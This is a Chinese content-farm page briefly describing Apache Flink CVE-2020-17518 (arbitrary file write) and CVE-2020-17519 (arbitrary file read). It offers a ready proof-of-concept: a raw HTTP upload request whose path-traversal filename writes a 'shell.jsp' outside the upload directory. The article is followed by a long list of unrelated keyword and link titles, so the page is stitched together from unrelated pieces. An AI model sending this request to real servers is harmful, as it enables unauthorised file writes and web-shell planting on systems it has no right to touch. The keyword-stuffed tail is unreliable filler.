Apache Flink POC漏洞CVE-2020-17518/17519的示例分析
发表于:2025-02-04 作者:千家信息网编辑
千家信息网最后更新 2025年02月04日,今天就跟大家聊聊有关 Apache Flink POC漏洞CVE-2020-17518/17519的示例分析,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可
千家信息网最后更新 2025年02月04日Apache Flink POC漏洞CVE-2020-17518/17519的示例分析
今天就跟大家聊聊有关 Apache Flink POC漏洞CVE-2020-17518/17519的示例分析,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。
CVE-2020-17518: 文件写入
攻击者利用REST API,可以修改HTTP头,将上传的文件写入到本地文件系统上的任意位置(Flink 1.5.1进程能访问到的)
CVE-2020-17519: 文件读取
Apache Flink 1.11.0 允许攻击者通过JobManager进程的REST API读取JobManager本地文件系统上的任何文件(JobManager进程能访问到的)
POC:
POST /jars/upload HTTP/1.1Host: IP:8081Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Connection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6YContent-Length: 189------WebKitFormBoundaryoZ8meKnrrso89R6YContent-Disposition: form-data; name="jarfile"; filename="../../../../../../etc/shell.jsp"success------WebKitFormBoundaryoZ8meKnrrso89R6Y--
看完上述内容,你们对 Apache Flink POC漏洞CVE-2020-17518/17519的示例分析有进一步的了解吗?如果还想了解更多知识或者相关内容,请关注行业资讯频道,感谢大家的支持。
文件
内容
进程
漏洞
示例
分析
攻击者
系统
攻击
位置
更多
知识
篇文章
行业
资讯
资讯频道
频道
进一
支持
有关
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
无边界网络安全教育
如何求数据库的键
安卓怎么做云同步数据库
怎么管理电脑是服务器
服务器内存和台式机内存有区别吗
刀剑乱舞那个服务器好
竞帆网络技术工作室
五菱星辰服务器坏了
数据库连接池 虚链
黄埔软件开发哪家强
大埔租房网络安全
网络安全横向到纵向到
服务器怎么刷琥珀
功能开发和软件开发
系统数据库安全方面如何设计
anki数据库损坏
苏州dell服务器配备工具
云服务器 虚拟机 数据库效率慢
山东爱岗软件开发有限公司
信息系统软件开发基础
网络安全反渗透视频
河南互助盘app软件开发
数据库求和再求平均
如何求数据库的键
网络安全读博士的意义
杭州闪银网络技术
软件开发流程管理 软件
宝山区网络技术服务参考价格
应当严格落实国家网络安全
速用数据库修改器
